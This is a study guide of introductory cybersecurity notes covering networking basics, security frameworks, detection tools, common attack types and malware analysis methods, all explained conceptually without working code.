Study Material

CIA Triad
■ Confidentiality → Ensures information is accessible only to authorized personnel (e.g., encryption)

■ Integrity → Ensures data remains accurate and unaltered (e.g., checksums)
Example:
1. Create a blank file and check their hash value.
2. Open the same file and add a single line and check their hash value.
3. Compare both the hash values, the hash value is different.
■ Availability → Ensures information and resources are accessible when needed (e.g., redundancy measures)
---------------------------------------------------------------------------------------------------------------------------------------------------
***************************************************************
---------------------------------------------------------------------------------------------------------------------------------------------------
Triple A’s of Security
■ Authentication → Verifying the identity of a user or system (e.g., password checks)
■ Authorization → Determining actions or resources an authenticated user can access (e.g., permissions)
■ Accounting → Tracking user activities and resource usage for audit or billing purposes.
---------------------------------------------------------------------------------------------------------------------------------------------------
***************************************************************
---------------------------------------------------------------------------------------------------------------------------------------------------
Security Control Types
■ Preventative
■ Deterrent
■ Detective
■ Corrective
■ Compensating
■ Directive
---------------------------------------------------------------------------------------------------------------------------------------------------
***************************************************************
---------------------------------------------------------------------------------------------------------------------------------------------------
Zero Trust Model
■ Operates on the principle that no one should be trusted by default
■ To achieve zero trust, we use the control plane and the data plane
● Control Plane
○ Adaptive identity, threat scope reduction, policy-driven access control, and secured zones
● Data Plane
○ Subject/system, policy engine, policy administrator, and establishing policy enforcement points
---------------------------------------------------------------------------------------------------------------------------------------------------
***************************************************************
---------------------------------------------------------------------------------------------------------------------------------------------------
System Ports
IP and their classes
Gateway scenario example
Common port numbers
Offensive & Defensive Define
Blue team & Red Team Define
1. System Ports
System ports refer to logical channels that allow networked devices to communicate with each other. Ports are
associated with an IP address and protocol type (e.g., TCP or UDP). They are used to differentiate types of
traffic, making sure that data is directed to the correct services.
- Port Numbers: Ports are numbered from 0 to 65535 and are split into different categories:
- Well-Known Ports (0-1023): These are reserved for core services like HTTP (port 80), HTTPS (port 443),
DNS (port 53), etc.
- Registered Ports (1024-49151): These ports can be registered by software companies for their applications.
Examples include MySQL (3306) and RDP (3389).
- Dynamic/Private Ports (49152-65535): These are temporary ports usually assigned to client software during
communication.
2. IP and Their Classes
An IP (Internet Protocol) address is a unique identifier assigned to each device on a network. The IP address is
divided into two versions:
- IPv4: It uses 32-bit addressing and has around 4.3 billion possible addresses.
- IPv6: A 128-bit address that provides a much larger address space.
IPv4 addresses are further categorized into classes based on the number of hosts and networks required.
- Class A:
Range: 1.0.0.0 to 126.0.0.0
Default Subnet Mask: 255.0.0.0
Supports a large number of hosts on a small number of networks (used by very large organizations).
- Class B:
Range: 128.0.0.0 to 191.255.0.0
Suitable for medium-sized networks (universities, large businesses).
- Class C:
Range: 192.0.0.0 to 223.255.255.0
Supports a large number of small networks with fewer hosts per network (common for small
organizations).
- Class D:
Range: 224.0.0.0 to 239.255.255.255
Used for multicast.
- Class E:
Range: 240.0.0.0 to 255.255.255.255
Reserved for research and future use.
3. Gateway Scenario Example
A gateway is a network device that acts as a bridge between two networks using different protocols. It can be a
router, firewall, or a server.
Scenario:
Imagine you have a private network (192.168.1.0/24) with several devices connected to the internet via
a router. The router acts as a gateway. When a computer on the private network sends a request to a
web server (like google.com), the following occurs:
- The computer sends the data to its default gateway (router).

- The router translates the private IP to a public IP using NAT (Network Address Translation).
- The router forwards the request to the public network (internet) via the ISP.
- The router receives the response and sends it back to the originating device within the private
network.
4. Common Port Numbers
Below are some common port numbers and the services they are associated with:
- 20, 21: FTP (File Transfer Protocol) – used for transferring files.
- 22: SSH (Secure Shell) – used for remote command-line login.
- 23: Telnet – an unencrypted remote access protocol.
- 25: SMTP (Simple Mail Transfer Protocol) – used for sending emails.
- 53: DNS (Domain Name System) – used for translating domain names to IP addresses.
- 80: HTTP (Hypertext Transfer Protocol) – used for web traffic.
- 443: HTTPS (HTTP Secure) – used for encrypted web traffic.
- 110: POP3 (Post Office Protocol) – used for retrieving emails from the server.
- 143: IMAP (Internet Message Access Protocol) – another email retrieval protocol.
- 3389: RDP (Remote Desktop Protocol) – used for remote desktop connections.
5. Offensive vs. Defensive Security
- Offensive Security: Involves proactively seeking and exploiting vulnerabilities in systems to improve
security. It includes activities like penetration testing, ethical hacking, red teaming, and social
engineering. The aim is to identify weaknesses before malicious actors do.
- Defensive Security: Involves strategies and technologies to prevent, detect, and mitigate security
threats. This includes firewalls, intrusion detection/prevention systems, monitoring, incident response,
and vulnerability management. The goal is to protect systems from attacks.
6. Blue Team vs. Red Team
- Blue Team:
- The defensive side of cybersecurity. The blue team is responsible for maintaining the security of
the system by implementing defenses, detecting attacks, and mitigating risks. Blue team
members continuously monitor the network for signs of attack, manage logs, and handle
incident response. Their goal is to minimize damage and prevent attackers from compromising
systems.
- Red Team:
- The offensive side of cybersecurity. The red team acts as ethical hackers, simulating real-world
cyber-attacks on a company’s infrastructure to identify vulnerabilities. The red team mimics
adversaries using techniques such as phishing, social engineering, or exploiting system flaws to
test and improve the organization’s defenses.
In a Red Team vs. Blue Team exercise, both teams collaborate to enhance an organization's security posture:
the red team exposes weaknesses, while the blue team strengthens the defenses based on lessons learned.
---------------------------------------------------------------------------------------------------------------------------------------------------
***************************************************************
---------------------------------------------------------------------------------------------------------------------------------------------------
OSI Layer
CBK cyber kill chain
Miter Framework
DNS diagram
FQDN - PQDN
DHCP
DMZ diagram
1. OSI Model (Open Systems Interconnection Model)
The OSI Model is a conceptual framework used to understand network interactions in seven distinct
layers. Each layer serves a specific function in the process of communication between two devices over
a network.
OSI Layers (from Layer 7 to Layer 1):
- Layer 7 – Application Layer: Deals with network services directly related to applications.
Protocols include HTTP, FTP, SMTP, etc. This is where users interact with network services.
- Layer 6 – Presentation Layer: Transforms data into a format that the application layer can
accept. It handles data encryption, decryption, compression, and translation.
- Layer 5 – Session Layer: Manages sessions between applications on different devices. This
layer establishes, maintains, and terminates sessions.
- Layer 4 – Transport Layer: Provides reliable data transfer through mechanisms like flow
control, error handling, and segmentation of data. Protocols: TCP (reliable) and UDP
(unreliable).
- Layer 3 – Network Layer: Handles logical addressing (IP addresses) and routes packets
across different networks. Protocols: IP, ICMP, ARP.
- Layer 2 – Data Link Layer: Ensures data transfer between adjacent nodes within the same
network using MAC addresses. It also manages error detection and frame synchronization.
Protocols: Ethernet, Wi-Fi.
- Layer 1 – Physical Layer: Deals with the transmission of raw bitstreams over physical
mediums such as cables, radio frequencies, and fiber optics.
2. Cyber Kill Chain (CKC)
The Cyber Kill Chain is a framework created by Lockheed Martin that describes the stages of a
cyberattack, from reconnaissance to exfiltration. It's commonly used in offensive security to understand
an adversary's tactics and for defenders to break the chain.
Stages of the Cyber Kill Chain:
1. Reconnaissance: Attackers gather intelligence on targets, identifying weaknesses and potential

attack vectors.
2. Weaponization: The attacker develops malware, such as a virus or exploit, that will be used in
the attack.
3. Delivery: The attacker delivers the weapon via email attachments, web links, or removable
devices.
4. Exploitation: The malicious payload is executed on the target's system, exploiting vulnerabilities.
5. Installation: The malware or backdoor is installed, providing persistent access to the attacker.
6. Command and Control (C2): The attacker establishes communication with the infected system
to control it remotely.
7. Actions on Objectives: The attacker carries out the intended action, such as data exfiltration,
destruction, or manipulation of data.
3. MITRE ATTaCK Framework
The MITRE ATT&CK Framework is a knowledge base of tactics and techniques that attackers use
across various stages of a cyberattack. It is widely used for threat intelligence, red teaming, and
improving defense mechanisms.
Key Components:
- Tactics: Goals that attackers aim to achieve, like initial access, persistence, or privilege
escalation.
- Techniques: Specific methods used to accomplish a tactic, like spear phishing or exploiting
software vulnerabilities.
- Sub-techniques: Variants of a technique with more granular details on how attackers execute a
specific action.
MITRE ATT&CK is useful for mapping security incidents, developing detection mechanisms, and
improving response plans based on real-world attack scenarios.
4. DNS Diagram
DNS (Domain Name System) translates human-readable domain names (like èxample.com`) into
machine-readable IP addresses.
Components of DNS:
- Root DNS Server: The top-level server that directs queries to TLD (Top-Level Domain) servers
(e.g., `.com`, `.org`).
- TLD DNS Server: It holds information for domain extensions like `.com` and forwards requests
to authoritative name servers.
- Authoritative DNS Server: Holds specific DNS records for domain names and returns the IP
address or other records.
DNS Query Process:
1. User requests a domain (like `www.example.com`).

2. DNS resolver queries the Root DNS Server.
3. The request is forwarded to the TLD server (e.g., `.com`).
4. The authoritative DNS server provides the IP address for èxample.com`.
5. The resolver returns the IP to the user’s browser to initiate the connection.
5. FQDN and PQDN
- FQDN (Fully Qualified Domain Name): A domain name that specifies its exact location in the DNS
hierarchy, including all domain levels. It ends with a dot representing the root. Example:
`www.example.com.`
- PQDN (Partially Qualified Domain Name): A domain name that doesn’t include all levels of the DNS
hierarchy and is relative to a root domain or another part of the hierarchy. Example: èxample.com` or
`www` (depending on the context).
6. DHCP (Dynamic Host Configuration Protocol)
DHCP is a network protocol used to assign IP addresses and other network configuration settings (like
default gateway and DNS servers) automatically to devices in a network, without the need for manual
configuration.
How DHCP Works:
1. DHCP Discover: The client device sends a broadcast message looking for a DHCP server.
2. DHCP Offer: The DHCP server responds with an offer, proposing an IP address.
3. DHCP Request: The client accepts the offer and requests the IP address.
4. DHCP Acknowledgement: The server acknowledges and leases the IP address to the client.
7. DMZ Diagram: A DMZ (Demilitarized Zone) is a section of a network that acts as a buffer between an
internal network and the external internet. It is used to host services that need to be accessible from the
internet while protecting the internal network from external threats.
Typical DMZ Setup:
- External Firewall: Protects the DMZ from external attacks.

- Internal Firewall: Protects the internal network from any compromised services within the DMZ.
- Servers in the DMZ: Hosts like web servers, FTP servers, or email servers reside here because
they need to be accessible from both the internal network and the internet.
---------------------------------------------------------------------------------------------------------------------------------------------------
***************************************************************
---------------------------------------------------------------------------------------------------------------------------------------------------
HTTP Request & Response
Log types
Application
System
Security
Virus & Threat protection
IOC / IOA
SIEM
EDR Working
Alert type
IDS & IPS
1. HTTP Request & Response
HTTP (Hypertext Transfer Protocol) is the foundation of data communication on the web. It works as a
request-response protocol between a client (usually a web browser) and a server.
HTTP Request
When a client wants to communicate with a server, it sends an HTTP request. The request
consists of the following components:
- Request Line: Includes the HTTP method (e.g., `GET`, `POST`), the requested URL, and the
HTTP version.
- Example: `GET /index.html HTTP/1.1`
- Headers: Provide additional information about the request (e.g., user agent, host, content type).
- Example: `Host: www.example.com`
- Body: Used in certain methods like `POST` to send data to the server (e.g., form submissions or
file uploads).
HTTP Response
The server responds to the client with an HTTP response, which contains the following:
- Status Line: Contains the HTTP version, status code, and status message.
- Example: `HTTP/1.1 200 OK`
- Headers: Provide meta-information like content type, server name, and date.
- Example: `Content-Type: text/html`
- Body: Contains the data or resource requested by the client (e.g., HTML, JSON, images).
2. Log Types
Logs are records generated by systems, applications, or devices to provide insight into their functioning
and any issues they may encounter. Logs are crucial for monitoring and troubleshooting.
Application Logs
- These logs are created by software applications and record events specific to the functioning of
the app. They can track user activity, application errors, and operational details.
- Example: A web server log recording incoming HTTP requests or an application
reporting performance issues.
System Logs
- Generated by the operating system to document activities like system startup, shutdown,
hardware failures, or driver installations.
- Example: Windows Event Viewer logs showing service start-ups, or Linux system logs
(`/var/log/syslog`) tracking kernel activities.
Security Logs
- These logs record events related to system and network security, such as login attempts
(successful or failed), unauthorized access attempts, or changes to security policies.
- Example: Audit logs that record user authentication details, system changes, and policy
updates.
3. Virus & Threat Protection
Virus and Threat Protection is a security feature typically offered by antivirus software that safeguards
systems against malware, viruses, and other threats. Modern antivirus software typically provides:
- Real-time protection: Constant monitoring for threats in files, memory, and network traffic.
- Scheduled scanning: Regular scans of the system to detect hidden threats.
- Threat mitigation: Quarantine or removal of malicious files.
- Threat intelligence: Using databases of known malware signatures and behaviors to detect new
threats.
- Examples of such tools include Microsoft Defender, Norton, and Kaspersky.
4. IOC (Indicators of Compromise) & IOA (Indicators of Attack)
These terms are used in cybersecurity to identify signs of potential threats:
IOC (Indicators of Compromise)
- Specific artifacts or evidence that indicate a system or network has been breached. They help in
identifying whether an attack has already occurred.
- Examples: Malware signatures, unusual outbound traffic, file hash values of known
malware, or changes in registry keys.
IOA (Indicators of Attack)
- Behavioral indicators that suggest malicious activity is taking place, focusing more on detecting
and mitigating attacks in progress rather than after the fact.
- Examples: Unusual login attempts, lateral movement across systems, unauthorized
privilege escalation.
5. SIEM (Security Information and Event Management)
SIEM is a technology that aggregates, correlates, and analyzes log data from across the network to
provide real-time security monitoring and incident response.
SIEM Functions:
- Log Aggregation: Collects logs and event data from various systems, applications, firewalls, and
network devices.
- Event Correlation: Analyzes logs to identify relationships between events to detect suspicious
patterns.
- Alerting: Notifies security teams when anomalous or suspicious activities are detected.
- Incident Management: Helps in tracking and responding to security incidents in an organized
manner.
- Forensic Analysis: Allows investigators to search historical logs for threat hunting and
post-incident investigation.
Popular SIEM tools include Splunk, IBM QRadar, and ArcSight.
6. EDR (Endpoint Detection and Response) Working
EDR is a security solution focused on detecting, investigating, and responding to security incidents on
endpoints (workstations, laptops, servers, etc.).
How EDR Works:
- Continuous Monitoring: EDR tools continuously monitor endpoint activities (file changes,
process creation, network connections).
- Threat Detection: Uses behavioral analysis, machine learning, and threat intelligence to detect
abnormal activities like malware execution or suspicious user behavior.
- Alerting: When an anomaly is detected, the EDR system raises an alert for the security team to
investigate.
- Response Capabilities: Many EDR solutions allow for immediate response actions like isolating
the endpoint, killing processes, or removing malicious files.
- Examples of EDR solutions include CrowdStrike Falcon, Carbon Black, and Microsoft Defender
for Endpoint.
7. Alert Types
In cybersecurity, different alert types are generated based on the severity and nature of the detected
threats:
- Informational Alert: These alerts are non-critical and provide general information about the
normal operation of the system.
- Example: A system successfully completed a scheduled task.
- Warning Alert: Indicates that an abnormal condition has been detected, but it may not be a
critical threat.
- Example: Multiple failed login attempts.
- Critical Alert: These are high-priority alerts that indicate a serious threat or compromise.
Immediate action is required.
- Example: Detection of ransomware activity or unauthorized access to sensitive data.
8. IDS (Intrusion Detection System) & IPS (Intrusion Prevention System)
Both IDS and IPS are network security technologies designed to detect and prevent unauthorized
access or attacks on a network.
IDS (Intrusion Detection System)
- Function: Monitors network traffic and system activities for malicious actions or policy violations.
It generates alerts when suspicious activity is detected.
Types:
- NIDS (Network-based IDS): Monitors network traffic for threats.

- HIDS (Host-based IDS): Monitors individual devices for suspicious activities.
- Limitation: IDS is passive and only alerts administrators but does not block or stop attacks.
IPS (Intrusion Prevention System)
Function: An IPS actively monitors and blocks malicious traffic in real-time. It sits inline
between the network and the firewall, intercepting and preventing attacks before they can reach
their target.
Types: Similar to IDS, IPS can also be network-based (NIPS) or host-based (HIPS).
Advantage: An IPS takes immediate action to mitigate threats, unlike IDS, which only alerts the
system.
---------------------------------------------------------------------------------------------------------------------------------------------------
***************************************************************
---------------------------------------------------------------------------------------------------------------------------------------------------
AMSI
Data Link Layer Working
AAA
TLP
TTP
1. AMSI (Antimalware Scan Interface)
AMSI (Antimalware Scan Interface) is a Windows-based security feature that provides an interface for
applications and services to integrate with anti-malware software (like Windows Defender) for scanning
content. AMSI works primarily to detect and block malicious scripts and files at runtime.
How AMSI Works:
- Script Scanning: AMSI intercepts malicious scripts (e.g., PowerShell, JavaScript, VBScript)
before they are executed. It scans the code for known malicious patterns.
- Content Scanning: AMSI can be used by applications to scan files, emails, or other content
types for malware before execution or processing.
- Collaboration with Antivirus: AMSI integrates with the system’s antivirus solution (like Windows
Defender) to provide real-time scanning and respond to threats before they can be executed.
AMSI is often used in security solutions to block obfuscated or encoded scripts, which attackers often
use to hide malicious payloads.
2. Data Link Layer (OSI Model)
The Data Link Layer is the second layer of the OSI Model and is responsible for node-to-node data
transfer. It ensures that data is correctly transmitted between two devices on the same network and
handles error detection and correction at the frame level.
Functions of the Data Link Layer:
- Framing: The Data Link Layer organizes data into frames. A frame contains the data being
transmitted and necessary control information, such as the source and destination MAC
addresses.
- MAC (Media Access Control): This sublayer controls how devices on the same network gain
access to the physical medium and transmit data. It also includes addressing to identify devices
via MAC addresses.
- Error Detection and Correction: The Data Link Layer detects errors that may occur during
transmission using error detection techniques like CRC (Cyclic Redundancy Check). If errors
are detected, the frame may be discarded or retransmitted.
- Flow Control: Ensures that the sender does not overwhelm the receiver by regulating the pace
at which data is sent.
Sublayers of Data Link Layer:
- LLC (Logical Link Control): Manages communication between upper layers and the Data Link
Layer, allowing multiple protocols to operate over the same physical medium.
- MAC (Media Access Control): Manages how devices on a network share and access the
network medium.
3. AAA (Authentication, Authorization, and Accounting)

AAA is a framework used to manage and control access to resources in a network. It ensures that
users are properly authenticated, authorized to access certain resources, and their activities are
tracked.
Components of AAA:
- Authentication: This step verifies the identity of the user or device. Common methods include
usernames and passwords, certificates, or biometric data.
- Example: When you log into a network using your credentials, authentication ensures
you are who you claim to be.
- Authorization: After successful authentication, authorization determines what resources the
authenticated user or device can access and what actions they can perform.
- Example: A user may be authorized to access certain files or systems but restricted from
accessing others.
- Accounting: Tracks and logs user actions, including when they logged in, what resources they
accessed, and the duration of their session. This data is useful for audits and monitoring.
- Example: Accounting records may show that a user accessed confidential data or used
excessive network bandwidth.
4. TLP (Traffic Light Protocol)
TLP (Traffic Light Protocol) is a system used for sharing sensitive information within a controlled
environment. It defines how the shared information can be used and disseminated based on four color
codes: red, amber, green, and white.
TLP Color Codes:
- TLP:RED: The most restricted level. Information labeled as RED should only be shared with the
original recipients, and not beyond, even within the same organization. Typically used for highly
sensitive information.
- TLP:AMBER: Information can be shared with specific groups within the organization, but not
externally without the provider’s consent. This is often used for information that needs to be
protected but can be shared within certain circles.
- TLP:GREEN: Information can be shared with the organization and trusted partners, but not
made public. It’s used for information that is sensitive but doesn't pose a serious risk if shared
with a wider, but still limited, audience.
- TLP:WHITE: Information can be freely shared and made public. There are no restrictions on
distribution.
TLP is commonly used in incident response, threat intelligence sharing, and cybersecurity coordination
between organizations.
5. TTP (Tactics, Techniques, and Procedures)

TTP is a framework used in cybersecurity to describe the behavior and methods attackers use to
accomplish their goals. By understanding TTPs, organizations can better identify and respond to cyber
threats.
Components of TTP:
- Tactics: The high-level objectives or goals that attackers are trying to achieve. This could be
gaining initial access, persistence, or data exfiltration.
- Example: A tactic may be to establish persistence in the system.
- Techniques: Specific methods attackers use to achieve their tactics. Techniques are more
concrete than tactics and describe how a particular goal is carried out.
- Example: A technique for achieving persistence could be creating a malicious service
that starts on boot.
- Procedures: The detailed processes or steps attackers use to implement techniques. These
may vary depending on the target or the tools available to the attacker.
- Example: A procedure might involve using a specific tool like Mimikatz to extract
passwords from a system.
TTPs help defenders to anticipate the methods attackers might use and to build detection mechanisms
based on observed behaviors. TTPs are often mapped out in frameworks like the MITRE ATT&CK.
---------------------------------------------------------------------------------------------------------------------------------------------------
***************************************************************
---------------------------------------------------------------------------------------------------------------------------------------------------
Finding the fingerprinting is malicous or not with basic example
Hiding malware into the software
Fileless Malware
Automatic Malware Analysis
Data aggregation, normalization, parsing
macro in document
Web Common Attack Types
APT
1. Finding Fingerprinting as Malicious (with Basic Example)
Fingerprinting is a technique where attackers gather information about a target system, application, or
network, often in preparation for an attack. It can be legitimate (used by websites to detect browsers or
operating systems) or malicious (used by attackers to collect information to exploit vulnerabilities).
Basic Example of Fingerprinting:
- Legitimate Fingerprinting: A website collects browser details (e.g., type, version, language,
installed plugins) to serve the right content (like a mobile-optimized site).
- Malicious Fingerprinting: A malicious website or attacker can use fingerprinting to gather
information about the browser, operating system, IP address, and installed software versions to
find vulnerabilities.
How to Detect Malicious Fingerprinting:

- Unusual Network Traffic: Look for unexpected outbound traffic from your system to unknown
or suspicious domains. Malicious fingerprinting scripts often attempt to exfiltrate data to external
servers.
- Suspicious Requests: Check for abnormal HTTP requests, such as a large number of
requests for information about system attributes that are unnecessary for legitimate purposes
(e.g., requests for installed plugins, fonts, screen resolution).
- Antivirus/Anti-malware Alerts: Modern security solutions can detect known fingerprinting
scripts that are used for reconnaissance.
2. Hiding Malware into Software
Malware can be hidden within legitimate software using various techniques, making it harder for users
to detect its presence. This is a common method used in both targeted attacks and widespread
malware campaigns.
Techniques for Hiding Malware:
- Trojanized Software: Attackers bundle malware with legitimate software. When the user
installs the software, both the legitimate application and the malware are installed. Examples
include downloading cracked software or fake versions of popular applications.
- Steganography: Malware can be hidden inside seemingly benign files (e.g., images or videos).
The malicious code is executed when the file is opened by a specially crafted program.
- Code Injection: Malware can be injected into a legitimate running process, allowing it to hide
within the memory space of trusted applications, making detection harder.
- Supply Chain Attacks: Attackers infect the software during the development or distribution
process. An example is the SolarWinds attack, where malicious code was introduced into the
software update of a widely-used IT management tool.
3. Fileless Malware:
Fileless Malware refers to a type of malware that does not rely on traditional files to infect a system.
Instead, it operates directly in the memory of the target system, leaving little to no trace on the hard
drive, making it more difficult to detect.
How Fileless Malware Works:
- Memory-based Attacks: The malware resides in the system’s RAM and disappears once the
system is rebooted.
- Exploiting Legitimate Tools: Fileless malware often uses trusted tools like PowerShell or WMI
(Windows Management Instrumentation) to carry out malicious actions. Since these tools are
commonly used in legitimate operations, it becomes harder to identify the malicious activity.
- No Executable Files: Unlike traditional malware that relies on an executable file (e.g., `.exe`),
fileless malware operates by exploiting vulnerabilities in running processes or legitimate
applications.
- Example: An attacker uses PowerShell to download a malicious script directly into
memory, executing it without saving the script to disk. Traditional antivirus software may
miss it since no file is written.
4. Automatic Malware Analysis

Automatic Malware Analysis involves using automated tools and sandboxes to detect and analyze
malware without manual intervention. This is essential in handling the massive volume of malware
samples generated daily.
Key Components of Automatic Malware Analysis:
- Static Analysis: The malware’s code and structure are analyzed without executing it. This
includes scanning for known signatures, analyzing file headers, and extracting embedded URLs
or strings.
- Dynamic Analysis: The malware is executed in a controlled environment (sandbox) to observe
its behavior, such as changes to files, network communications, or registry modifications.
- Behavioral Analysis: Monitors how the malware behaves when executed, such as whether it
tries to access certain files, spawn processes, or communicate with a command-and-control
server.
- Example of Tools:
- Cuckoo Sandbox: An open-source automated malware analysis system that provides
detailed behavior reports after executing suspicious files in a virtual environment.
- VirusTotal: A platform that scans files using multiple antivirus engines and provides
reports based on both signature and behavioral analysis.
5. Data Aggregation, Normalization, and Parsing
These are key processes in cybersecurity for dealing with logs, events, and other data collected from
various sources.
- Data Aggregation: Collecting data from different sources such as firewalls, endpoint logs,
IDS/IPS, and applications. The goal is to consolidate information for centralized analysis.
- Normalization: Converting diverse data formats into a consistent and standard format so that it
can be processed and analyzed uniformly. For example, logs from different devices may use
different time formats or terminologies, so normalization ensures they are all converted to a
standard format.
- Parsing: Breaking down and interpreting the raw log data into individual components (e.g.,
timestamp, IP address, action) so that it can be indexed and queried.
These steps are often handled by SIEM systems (Security Information and Event Management) to
identify patterns and detect security threats across different sources of data.
6. Macro in Document
Macros are scripts embedded in documents (such as Word or Excel files) that automate repetitive
tasks. While macros can be useful for legitimate purposes, they are often exploited by attackers to
deliver malware.
Macro-based Malware:
- How it Works: An attacker creates a document with a malicious macro, and when the user
opens the document and enables macros, the malicious code is executed. This code could
download malware, steal data, or perform other harmful actions.
- Example: A phishing email may contain an attached Word document with a macro. When the
victim opens the document and enables macros, the malware is downloaded and executed.
- Mitigation: Disabling macros by default and only enabling them from trusted sources is a
common defense against macro-based attacks.
7. Web Common Attack Types
Web applications are frequently targeted by various attack types. Below are some of the most common
ones:
- SQL Injection: Attackers inject malicious SQL queries into a vulnerable web application’s input
fields to manipulate the database, potentially gaining access to sensitive data or bypassing
authentication.
- Cross-Site Scripting (XSS): Attackers inject malicious scripts into web pages viewed by other
users. The script runs in the user's browser, potentially stealing cookies, session tokens, or
executing actions on behalf of the user.
- Cross-Site Request Forgery (CSRF): An attacker tricks a user into executing unwanted
actions on a web application in which the user is authenticated. For example, clicking a
malicious link could result in transferring funds from the user’s account without their consent.
- Directory Traversal: This attack exploits vulnerabilities to access files outside the web server’s
root directory, allowing attackers to view or execute sensitive files.
- File Upload Vulnerabilities: Attackers upload malicious files to the server, leading to code
execution or unauthorized access.
8. APT (Advanced Persistent Threat)
APT (Advanced Persistent Threat) refers to a highly sophisticated, long-term cyber attack carried out by
a skilled and well-resourced attacker, often targeting specific organizations or governments for political
or financial gain.
Characteristics of APTs:
- Advanced: The attacker uses a combination of various tools, techniques, and exploits, often
custom-built for the target.
- Persistent: The attacker remains undetected for a prolonged period to achieve their goal, which
is often data theft, espionage, or disruption of critical infrastructure.
- Threat: APTs are typically carried out by organized groups, such as nation-states or
cybercriminal gangs, with the capability to carry out large-scale and coordinated attacks.
APT Lifecycle:
1. Initial Compromise: Gaining access through methods like phishing, exploiting vulnerabilities, or
social engineering.
2. Establishing Foothold: Installing backdoors or malware to maintain access.
3. Escalating Privileges: Gaining higher-level permissions to access sensitive data or systems.
4. Internal Reconnaissance: Mapping the internal network to locate valuable assets.
5. Data Exfiltration: Transferring sensitive data out of the network.
6. Covering Tracks: Hiding evidence of the attack to remain undetected.
Examples of APT groups include APT28 (Fancy Bear), a Russian-based cyber-espionage group, and
APT33, an Iranian state-sponsored threat actor.
Always question HOW, WHAT & WHY ?
---------------------------------------------------------------------------------------------------------------------------------------------------
***************************************************************
---------------------------------------------------------------------------------------------------------------------------------------------------
Persistence
How malware attack persist into the network
BIggest IT Outage
Phishing Mail
Static Malware Analysis
Dynamic Malware Analysis
Hybrid Malware Analysis
Hypervisor
1. Persistence (in Malware Attacks)
Persistence refers to the techniques malware uses to maintain long-term access to a system, even
after reboots, software updates, or user logouts. The goal of persistence is to ensure that the malware
can continue its operation without being easily removed or detected.
Common Persistence Techniques:
- Startup Items: Malware may add itself to startup programs or registry entries, ensuring it runs
every time the system boots.
- Example: Adding malicious code to the `Run` key in the Windows Registry
(`HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run`).
- Scheduled Tasks: Malware may create scheduled tasks (e.g., via Windows Task Scheduler) that
execute malicious code at set intervals or system events.
- Service Installation: Malware can install itself as a service that starts automatically during
system boot, such as creating a Windows service that restarts the malware whenever it is
stopped.
- DLL Hijacking: Attackers place malicious Dynamic Link Libraries (DLLs) in locations where
legitimate programs expect them, making the operating system execute the malicious code
during program startup.
- Web Shells: In web environments, attackers may install web shells to maintain remote access to
compromised web servers even if the server is rebooted.
2. How Malware Persists in a Network
Once malware successfully infiltrates a network, it uses various techniques to ensure long-term control
and continued access:
Techniques for Network Persistence:

- Lateral Movement: After gaining access to one machine, malware moves across the network to
infect additional systems. It might use stolen credentials or exploit vulnerabilities in other
devices to spread.
- Credential Dumping: Malware often attempts to steal login credentials (e.g., using tools like
Mimikatz) and use them to authenticate and maintain access to other machines in the network.
- Domain Admin Account Access: By obtaining domain admin rights, attackers can control and
manipulate all devices in the domain, ensuring persistence across the network.
- Backdoor Installation: The malware installs backdoors on multiple machines, allowing the
attacker to regain access even if the original infection point is detected and removed.
- Network Traffic Manipulation: Malware can manipulate DNS or ARP (Address Resolution
Protocol) tables to route traffic through malicious proxies or maintain control over network flows.
3. Biggest IT Outage
The Biggest IT Outage could refer to major network failures or cyberattacks that disrupted services
across large organizations or even countries. Here are some significant examples:
- Facebook Outage (October 2021): A configuration change caused Facebook, Instagram,

WhatsApp, and other services to go offline for several hours. This was one of the largest global
outages, affecting millions of users worldwide.
- Dyn DDoS Attack (October 2016): A Distributed Denial-of-Service (DDoS) attack targeted DNS
provider Dyn, causing major websites like Twitter, Reddit, GitHub, and Netflix to go offline. This
was one of the most significant outages, caused by the Mirai Botnet, which used infected IoT
devices to launch the attack.
- British Airways (2017): A power failure led to a massive IT outage for British Airways, grounding
flights and affecting tens of thousands of passengers. The outage was reported to have cost the
airline over £80 million.
These examples show how complex IT infrastructures are susceptible to human error, cyberattacks, or
power failures, leading to widespread disruption.
4. Phishing Mail
Phishing Mail is a type of cyberattack in which attackers send deceptive emails designed to trick the
recipient into revealing sensitive information, such as login credentials, or downloading malware.
Key Features of a Phishing Email:
- Deceptive Sender: The email appears to come from a trusted source, such as a bank,
colleague, or service provider, but the sender’s address may be slightly altered (e.g.,
`[email protected]` instead of `[email protected]`).
- Urgent Language: Phishing emails often create a sense of urgency, such as warning the
recipient that their account has been compromised or that they need to act immediately to avoid
penalties.
- Malicious Links or Attachments: The email may contain links that lead to a fake website
designed to steal login credentials or download malware. Attachments can also contain
malicious payloads (e.g., trojans, ransomware).
- Examples:
- A fake email from "Microsoft Support" asking you to reset your password by clicking on a
suspicious link.
- An email from a fake "HR department" asking you to download and sign a malicious
attachment disguised as a company policy document.
5. Static Malware Analysis
Static Malware Analysis involves analyzing the malware without executing it. This is a safer method that
focuses on examining the structure, code, and metadata of the file to understand its functionality.
Steps in Static Malware Analysis:
- File Inspection: Identifying file type, size, and structure (e.g., PE file for Windows). Tools like
PEiD and Die help determine if the file is packed or obfuscated.
- Signature-Based Detection: Scanning the malware file against a database of known signatures
to identify if the sample matches any known malware variants (using tools like VirusTotal).
- Disassembly: Using a disassembler (e.g., IDA Pro) to convert the machine code into
human-readable assembly code. Analysts review this to understand the malware’s logic and
function.
- String Analysis: Searching for readable strings within the malware using tools like Strings to find
URLs, commands, or text that indicate its behavior or target.
Limitations:
- Static analysis can be thwarted by packing, encryption, or obfuscation techniques that hide the
true code or logic of the malware.
6. Dynamic Malware Analysis
Dynamic Malware Analysis involves running the malware in a controlled environment (sandbox) to
observe its behavior in real-time. This method is useful for seeing exactly how the malware interacts
with the system and network.
Steps in Dynamic Malware Analysis:
- Sandbox Execution: The malware is executed in a virtualized or sandboxed environment, where

its actions (e.g., file creation, network communication, process spawning) are monitored.
- Behavioral Observation: Analysts track the malware’s behavior, such as file modifications,
registry changes, system process injection, and network connections.
- Network Traffic Monitoring: The malware’s network behavior is captured using tools like
Wireshark to analyze whether it connects to external command-and-control servers or attempts
to exfiltrate data.
- API Calls: Monitoring system API calls using tools like Procmon to see what actions the
malware takes, such as reading or writing to disk, creating processes, or modifying system
settings.
Advantages:
- Dynamic analysis can reveal the real behavior of obfuscated or packed malware,
especially when static analysis is ineffective.
7. Hybrid Malware Analysis
Hybrid Malware Analysis combines both static and dynamic analysis techniques. The goal is to
leverage the benefits of both methods to gain a more comprehensive understanding of malware
